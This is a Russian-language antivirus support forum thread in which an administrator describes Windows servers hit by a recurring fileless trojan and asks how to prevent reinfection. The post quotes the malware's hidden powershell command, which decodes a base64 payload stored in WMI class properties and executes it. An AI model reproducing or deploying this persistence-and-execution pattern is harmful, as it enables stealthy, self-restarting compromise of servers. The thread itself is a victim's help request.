Перейти к содержанию

Powershell загружает серверы на 100%


ChillingTouch

Рекомендуемые сообщения

Оформлен инцидент INC000008415373, в двух словах продублирую здесь.

 

На серверах с всевозможными версиями Windows Server обнаруживается работающий процесс powershell, грузящий процессор на 100%. Если процесс убить, то он потом снова запускается. Командные строки процессов отличаются, но типа этого:

powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value; $funs = ([WmiClas*] 'root\default:Win32_TaskService').Properties['funs'].Value ; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))); Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

После загрузки системы в безопасном режиме и сканирования с помощью KVRT находится в System Memory и удаляется Trojan.Multi.GenAutorunWMI.a, после перезагрузки всё вроде бы нормально.

 

На серверах установлен KSWS 10.0.0.486, посоветуйте, где что настроить, чтобы избежать повторных случаев.

Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

Дождитесь ответа ТП. Одновременное лечение в разных местах только сбивает с толку консультантов.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты

Этот раздел посвящен уничтожению вирусов, в соответствии с правилами раздела вы должны внимательно прочитать и аккуратно выполнить указания в теме «Порядок оформления запроса о помощи».
Если ваш вопрос не касается этого раздела, то ваша тема будет перенесена в раздел Помощь по продуктам Лаборатории Касперского

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Alexoon
      Автор Alexoon
      Подхватил какой-то вирус с почты. Постоянно открывается powershell и браузеры, т.е. по 5 раз в секунду
       
      Антивирусы ни один его не видят
      CollectionLog-2025.08.22-16.02.zip
    • DeniTornado
      Автор DeniTornado
      Доброго всем!
      Коллеги, а кто-нибудь использует KES на своих RDS серверах? Все нормально с работой серверов?
       
      Дано:
      - несколько RDS на Windows Server 2019
      - на них установлен KES 12.1.0.506
       
      Проблема:
      Вот уже в течении нескольких дней подряд наблюдаю утром проблему пока только на RDS (на остальных серверах пока все нормально - служебные серверы для определенных целей). То один сервер, то второй, то третий - утром когда все пользователи заходят на свои рабочие столы (почти все у нас работают на терминальных серверах со своих тонких клиентов), зайти не могут! Сервер тупо не отвечает на запросы. RDSы - это виртуальные машины на Hyper-V. Приходится через консоль Hyper-V перезагружать виртуалку и тогда она или после первой перезагрузки или после второй начинает пускать пользователей.
      Самое интересное что в логах ни чего такого, что указало бы на проблему. ТП в собранных логах ни чего криминального не видит
       
      До установки KES такого не было ни когда! Раньше пользовались другим известным антивирусом вообще не знали таких симптомов и проблем.
      Есть у кого схожие проблемы на RDS?
       
      И еще такой вопрос: на RDS серверах я использую скрытый режим работы KES - в настройках политики для RDSов отключил интерфейс. Не за чем пользователям его видеть в трее Windows. Но при такой настройке становится недоступна проверка из контекстного меню WIndows файлов на вирусы - эти менюшки серые и их не нажать. Можно как-то и скрыть KES, но при этом и функция проверки из контекстного меню была доступна?
    • Anivas
      Автор Anivas
      Доброго времени суток.
       
      Перестал подключатся Kaspersky Secure Connection к серверам через мобильны интернет. Выдает ошибку (скрин ниже). Подскажите, пожалуйста, что сделать.

    • komma77
      Автор komma77
      Добрый день. Зашифрованы сервер и компьютеры.  
      файлы и записка.zip Addition.txt FRST.txt
    • dpk
      Автор dpk
      Ночью к серверу подключились по rdp. На рабочем столе обнаружились папки злоумышленника. Одна из них hi в ней лежал stub.exe. Все журналы событий были почищены.
      В безопасном режиме прошелся cureit, а так же лог FRST в безопасном режиме был сделан. Папка hi под паролем virus. Папка files под паролем shifr.
      hi.zip files.zip
×
×
  • Создать...